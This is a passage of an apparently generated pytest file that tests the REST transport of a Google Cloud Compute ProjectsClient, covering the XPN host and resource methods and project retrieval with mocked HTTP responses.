        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Fake a successful (empty) Operation response from the session.
        ok_response = Response()
        ok_response.status_code = 200
        ok_response._content = compute.Operation.to_json(compute.Operation()).encode(
            "UTF-8"
        )
        req.return_value = ok_response
        # Truthy flattened fields, overridden by path params satisfying the
        # http rule for this method.
        call_kwargs = dict(
            project="project_value",
            projects_disable_xpn_resource_request_resource=compute.ProjectsDisableXpnResourceRequest(
                xpn_resource=compute.XpnResourceId(id="id_value")
            ),
        )
        call_kwargs.update({"project": "sample1"})
        client.disable_xpn_resource_unary(**call_kwargs)
        # Exactly one HTTP call, aimed at the disableXpnResource URI.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/disableXpnResource"
            % client.transport._host,
            args[1],
        )
def test_disable_xpn_resource_unary_rest_flattened_error(transport: str = "rest"):
    """Mixing a request object with flattened fields must raise ValueError."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    request_object = compute.DisableXpnResourceProjectRequest()
    # Supplying both a request object and flattened fields is ambiguous,
    # so the client refuses the call.
    with pytest.raises(ValueError):
        client.disable_xpn_resource_unary(
            request_object,
            project="project_value",
            projects_disable_xpn_resource_request_resource=compute.ProjectsDisableXpnResourceRequest(
                xpn_resource=compute.XpnResourceId(id="id_value")
            ),
        )
def test_disable_xpn_resource_unary_rest_error():
    """Constructing a REST client with anonymous credentials succeeds."""
    creds = ga_credentials.AnonymousCredentials()
    ProjectsClient(credentials=creds, transport="rest")
@pytest.mark.parametrize("request_type", [compute.EnableXpnHostProjectRequest, dict,])
def test_enable_xpn_host_unary_rest(request_type):
    """enable_xpn_host_unary over REST returns a compute.Operation whose
    fields mirror the JSON payload served by the mocked HTTP session, for both
    a proto request object and a plain dict.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.enable_xpn_host_unary(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_enable_xpn_host_unary_rest_required_fields(
    request_type=compute.EnableXpnHostProjectRequest,
):
    """Required-field handling for enable_xpn_host: default-valued required
    fields are reported as unset, explicitly-set ones survive, and the call
    succeeds with transcoding mocked so no path params are demanded.
    """
    transport_class = transports.ProjectsRestTransport
    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )
    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).enable_xpn_host._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).enable_xpn_host._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)
    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)
    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode.return_value = transcode_result
            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value
            response = client.enable_xpn_host_unary(request)
            # No extra query params should be injected by the method itself.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_enable_xpn_host_unary_rest_unset_required_fields():
    """The unset-required-fields helper for enable_xpn_host reports only
    `requestId` intersected with the method's required fields.

    Fix: pass an AnonymousCredentials *instance* to the transport — the
    original passed the class object itself, which only worked by accident
    and is inconsistent with every other construction in this file.
    """
    transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials()
    )
    unset_fields = transport.enable_xpn_host._get_unset_required_fields({})
    assert set(unset_fields) == (set(("requestId",)) & set(("project",)))
def test_enable_xpn_host_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.EnableXpnHostProjectRequest
):
    """An HTTP 400 from the REST session surfaces as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # Build a request whose fields satisfy the URI transcoding rules.
    request = request_type({"project": "sample1"})
    # Fake a 400 response from the underlying HTTP session.
    bad_response = Response()
    bad_response.status_code = 400
    bad_response.request = Request()
    with mock.patch.object(Session, "request") as mocked_request:
        mocked_request.return_value = bad_response
        with pytest.raises(core_exceptions.BadRequest):
            client.enable_xpn_host_unary(request)
def test_enable_xpn_host_unary_rest_flattened():
    """Flattened arguments are expanded into the expected enableXpnHost URI."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Fake a successful (empty) Operation response from the session.
        ok_response = Response()
        ok_response.status_code = 200
        ok_response._content = compute.Operation.to_json(compute.Operation()).encode(
            "UTF-8"
        )
        req.return_value = ok_response
        # Truthy flattened fields, overridden by path params satisfying the
        # http rule for this method.
        call_kwargs = dict(project="project_value",)
        call_kwargs.update({"project": "sample1"})
        client.enable_xpn_host_unary(**call_kwargs)
        # Exactly one HTTP call, aimed at the enableXpnHost URI.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/enableXpnHost"
            % client.transport._host,
            args[1],
        )
def test_enable_xpn_host_unary_rest_flattened_error(transport: str = "rest"):
    """Mixing a request object with flattened fields must raise ValueError."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    request_object = compute.EnableXpnHostProjectRequest()
    # Supplying both a request object and flattened fields is ambiguous,
    # so the client refuses the call.
    with pytest.raises(ValueError):
        client.enable_xpn_host_unary(request_object, project="project_value")
def test_enable_xpn_host_unary_rest_error():
    """Constructing a REST client with anonymous credentials succeeds."""
    creds = ga_credentials.AnonymousCredentials()
    ProjectsClient(credentials=creds, transport="rest")
@pytest.mark.parametrize(
    "request_type", [compute.EnableXpnResourceProjectRequest, dict,]
)
def test_enable_xpn_resource_unary_rest(request_type):
    """enable_xpn_resource_unary must deserialize a REST reply into Operation.

    Parametrized over the proto request type and a plain dict, both of which
    the client accepts as the request argument.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["projects_enable_xpn_resource_request_resource"] = {
        "xpn_resource": {"id": "id_value", "type_": "type__value"}
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.enable_xpn_resource_unary(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_enable_xpn_resource_unary_rest_required_fields(
    request_type=compute.EnableXpnResourceProjectRequest,
):
    """Required-field handling: defaults are dropped, explicit values kept."""
    transport_class = transports.ProjectsRestTransport
    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )
    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).enable_xpn_resource._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).enable_xpn_resource._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)
    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)
    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode_result["body"] = {}
            transcode.return_value = transcode_result
            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value
            response = client.enable_xpn_resource_unary(request)
            # No query params beyond the defaults should be sent on the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_enable_xpn_resource_unary_rest_unset_required_fields():
    """Unset-required-fields for enable_xpn_resource must match the API spec.

    The expected value is the intersection of the method's optional
    parameters with its required fields.
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials. Previously the class object itself
        # was passed (missing call parens), unlike every other construction
        # in this file.
        credentials=ga_credentials.AnonymousCredentials()
    )
    unset_fields = transport.enable_xpn_resource._get_unset_required_fields({})
    assert set(unset_fields) == (
        set(("requestId",))
        & set(("project", "projectsEnableXpnResourceRequestResource",))
    )
def test_enable_xpn_resource_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.EnableXpnResourceProjectRequest
):
    """An HTTP 400 reply must surface as core_exceptions.BadRequest."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Build a request that satisfies URL transcoding for this method.
    request = request_type(
        {
            "project": "sample1",
            "projects_enable_xpn_resource_request_resource": {
                "xpn_resource": {"id": "id_value", "type_": "type__value"}
            },
        }
    )
    # Fake a 400 response from the underlying session.
    fake_response = Response()
    fake_response.status_code = 400
    fake_response.request = Request()
    with mock.patch.object(Session, "request") as req:
        req.return_value = fake_response
        with pytest.raises(core_exceptions.BadRequest):
            client.enable_xpn_resource_unary(request)
def test_enable_xpn_resource_unary_rest_flattened():
    """Flattened kwargs for enable_xpn_resource_unary must expand into the URL."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Operation()
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        # get arguments that satisfy an http rule for this method
        sample_request = {"project": "sample1"}
        # get truthy value for each flattened field
        mock_args = dict(
            project="project_value",
            projects_enable_xpn_resource_request_resource=compute.ProjectsEnableXpnResourceRequest(
                xpn_resource=compute.XpnResourceId(id="id_value")
            ),
        )
        # sample_request values win for keys present in both dicts.
        mock_args.update(sample_request)
        client.enable_xpn_resource_unary(**mock_args)
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        # args[1] is validated against the http rule's URL template.
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/enableXpnResource"
            % client.transport._host,
            args[1],
        )
def test_enable_xpn_resource_unary_rest_flattened_error(transport: str = "rest"):
    """Mixing a request object with flattened fields must raise ValueError."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Supplying both a fully-formed request and flattened fields is ambiguous.
    request = compute.EnableXpnResourceProjectRequest()
    resource = compute.ProjectsEnableXpnResourceRequest(
        xpn_resource=compute.XpnResourceId(id="id_value")
    )
    with pytest.raises(ValueError):
        client.enable_xpn_resource_unary(
            request,
            project="project_value",
            projects_enable_xpn_resource_request_resource=resource,
        )
def test_enable_xpn_resource_unary_rest_error():
    """Smoke test: constructing a REST-transport client must not raise."""
    # Construction itself is the check; any failure surfaces as an exception.
    client = ProjectsClient(
        transport="rest", credentials=ga_credentials.AnonymousCredentials()
    )
@pytest.mark.parametrize("request_type", [compute.GetProjectRequest, dict,])
def test_get_rest(request_type):
    """get must deserialize a REST reply into a compute.Project.

    Parametrized over the proto request type and a plain dict, both of which
    the client accepts as the request argument.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Project(
            creation_timestamp="creation_timestamp_value",
            default_network_tier="default_network_tier_value",
            default_service_account="default_service_account_value",
            description="description_value",
            enabled_features=["enabled_features_value"],
            id=205,
            kind="kind_value",
            name="name_value",
            self_link="self_link_value",
            xpn_project_status="xpn_project_status_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Project.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.get(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Project)
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.default_network_tier == "default_network_tier_value"
    assert response.default_service_account == "default_service_account_value"
    assert response.description == "description_value"
    assert response.enabled_features == ["enabled_features_value"]
    assert response.id == 205
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.self_link == "self_link_value"
    assert response.xpn_project_status == "xpn_project_status_value"
def test_get_rest_required_fields(request_type=compute.GetProjectRequest):
    """Required-field handling for get: defaults dropped, explicit values kept."""
    transport_class = transports.ProjectsRestTransport
    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )
    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).get._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).get._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)
    # Designate an appropriate value for the returned response.
    return_value = compute.Project()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "get",
                "query_params": request_init,
            }
            transcode.return_value = transcode_result
            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Project.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value
            response = client.get(request)
            # No query params beyond the defaults should be sent on the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_get_rest_unset_required_fields():
    """Unset-required-fields for get must match the API spec.

    The expected value is the intersection of the method's optional
    parameters (none) with its required fields.
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials. Previously the class object itself
        # was passed (missing call parens), unlike every other construction
        # in this file.
        credentials=ga_credentials.AnonymousCredentials()
    )
    unset_fields = transport.get._get_unset_required_fields({})
    assert set(unset_fields) == (set(()) & set(("project",)))
def test_get_rest_bad_request(
    transport: str = "rest", request_type=compute.GetProjectRequest
):
    """An HTTP 400 reply must surface as core_exceptions.BadRequest."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Build a request that satisfies URL transcoding for this method.
    request = request_type({"project": "sample1"})
    # Fake a 400 response from the underlying session.
    fake_response = Response()
    fake_response.status_code = 400
    fake_response.request = Request()
    with mock.patch.object(Session, "request") as req:
        req.return_value = fake_response
        with pytest.raises(core_exceptions.BadRequest):
            client.get(request)
def test_get_rest_flattened():
    """Flattened kwargs for get must expand into the expected URL."""
    client = ProjectsClient(
        transport="rest", credentials=ga_credentials.AnonymousCredentials()
    )
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Fake a successful (200) reply carrying a serialized empty Project.
        fake_response = Response()
        fake_response.status_code = 200
        fake_response._content = compute.Project.to_json(compute.Project()).encode(
            "UTF-8"
        )
        req.return_value = fake_response
        # Arguments that satisfy the http rule; the sample values override
        # the truthy placeholders for keys present in both dicts.
        sample_request = {"project": "sample1"}
        call_kwargs = dict(project="project_value")
        call_kwargs.update(sample_request)
        client.get(**call_kwargs)
        # Exactly one HTTP call, whose URL matches the rule's template.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        expected_template = (
            "https://%s/compute/v1/projects/{project}" % client.transport._host
        )
        assert path_template.validate(expected_template, args[1])
def test_get_rest_flattened_error(transport: str = "rest"):
    """Mixing a request object with flattened fields must raise ValueError."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Supplying both a fully-formed request and flattened fields is ambiguous.
    request = compute.GetProjectRequest()
    with pytest.raises(ValueError):
        client.get(request, project="project_value")
def test_get_rest_error():
    """Smoke test: constructing a REST-transport client must not raise."""
    # Construction itself is the check; any failure surfaces as an exception.
    client = ProjectsClient(
        transport="rest", credentials=ga_credentials.AnonymousCredentials()
    )
@pytest.mark.parametrize("request_type", [compute.GetXpnHostProjectRequest, dict,])
def test_get_xpn_host_rest(request_type):
    """get_xpn_host must deserialize a REST reply into a compute.Project.

    Parametrized over the proto request type and a plain dict, both of which
    the client accepts as the request argument.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Project(
            creation_timestamp="creation_timestamp_value",
            default_network_tier="default_network_tier_value",
            default_service_account="default_service_account_value",
            description="description_value",
            enabled_features=["enabled_features_value"],
            id=205,
            kind="kind_value",
            name="name_value",
            self_link="self_link_value",
            xpn_project_status="xpn_project_status_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Project.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.get_xpn_host(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Project)
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.default_network_tier == "default_network_tier_value"
    assert response.default_service_account == "default_service_account_value"
    assert response.description == "description_value"
    assert response.enabled_features == ["enabled_features_value"]
    assert response.id == 205
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.self_link == "self_link_value"
    assert response.xpn_project_status == "xpn_project_status_value"
def test_get_xpn_host_rest_required_fields(
    request_type=compute.GetXpnHostProjectRequest,
):
    """Required-field handling for get_xpn_host: defaults dropped, set values kept."""
    transport_class = transports.ProjectsRestTransport
    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )
    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).get_xpn_host._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).get_xpn_host._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)
    # Designate an appropriate value for the returned response.
    return_value = compute.Project()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "get",
                "query_params": request_init,
            }
            transcode.return_value = transcode_result
            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Project.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value
            response = client.get_xpn_host(request)
            # No query params beyond the defaults should be sent on the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_get_xpn_host_rest_unset_required_fields():
    """Unset-required-fields for get_xpn_host must match the API spec.

    The expected value is the intersection of the method's optional
    parameters (none) with its required fields.
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials. Previously the class object itself
        # was passed (missing call parens), unlike every other construction
        # in this file.
        credentials=ga_credentials.AnonymousCredentials()
    )
    unset_fields = transport.get_xpn_host._get_unset_required_fields({})
    assert set(unset_fields) == (set(()) & set(("project",)))
def test_get_xpn_host_rest_bad_request(
    transport: str = "rest", request_type=compute.GetXpnHostProjectRequest
):
    """An HTTP 400 reply must surface as core_exceptions.BadRequest."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Build a request that satisfies URL transcoding for this method.
    request = request_type({"project": "sample1"})
    # Fake a 400 response from the underlying session.
    fake_response = Response()
    fake_response.status_code = 400
    fake_response.request = Request()
    with mock.patch.object(Session, "request") as req:
        req.return_value = fake_response
        with pytest.raises(core_exceptions.BadRequest):
            client.get_xpn_host(request)
def test_get_xpn_host_rest_flattened():
    """Flattened kwargs for get_xpn_host must expand into the expected URL."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Project()
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Project.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        # get arguments that satisfy an http rule for this method
        sample_request = {"project": "sample1"}
        # get truthy value for each flattened field
        mock_args = dict(project="project_value",)
        # sample_request values win for keys present in both dicts.
        mock_args.update(sample_request)
        client.get_xpn_host(**mock_args)
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        # args[1] is validated against the http rule's URL template.
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/getXpnHost"
            % client.transport._host,
            args[1],
        )
def test_get_xpn_host_rest_flattened_error(transport: str = "rest"):
    """Mixing a request object with flattened fields must raise ValueError."""
    client = ProjectsClient(
        transport=transport, credentials=ga_credentials.AnonymousCredentials()
    )
    # Supplying both a fully-formed request and flattened fields is ambiguous.
    request = compute.GetXpnHostProjectRequest()
    with pytest.raises(ValueError):
        client.get_xpn_host(request, project="project_value")
def test_get_xpn_host_rest_error():
    """Smoke test: constructing a REST-transport client must not raise."""
    # Construction itself is the check; any failure surfaces as an exception.
    client = ProjectsClient(
        transport="rest", credentials=ga_credentials.AnonymousCredentials()
    )
@pytest.mark.parametrize(
    "request_type", [compute.GetXpnResourcesProjectsRequest, dict,]
)
def test_get_xpn_resources_rest(request_type):
    """get_xpn_resources must wrap the REST reply in a GetXpnResourcesPager.

    Parametrized over the proto request type and a plain dict, both of which
    the client accepts as the request argument.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.ProjectsGetXpnResources(
            kind="kind_value", next_page_token="next_page_token_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.ProjectsGetXpnResources.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.get_xpn_resources(request)
    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.GetXpnResourcesPager)
    assert response.kind == "kind_value"
    assert response.next_page_token == "next_page_token_value"
def test_get_xpn_resources_rest_required_fields(
    request_type=compute.GetXpnResourcesProjectsRequest,
):
    """Required-field handling for get_xpn_resources: defaults dropped, set values kept."""
    transport_class = transports.ProjectsRestTransport
    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )
    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).get_xpn_resources._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)
    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).get_xpn_resources._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(
        ("max_results", "filter", "order_by", "page_token", "return_partial_success",)
    )
    jsonified_request.update(unset_fields)
    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)
    # Designate an appropriate value for the returned response.
    return_value = compute.ProjectsGetXpnResources()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
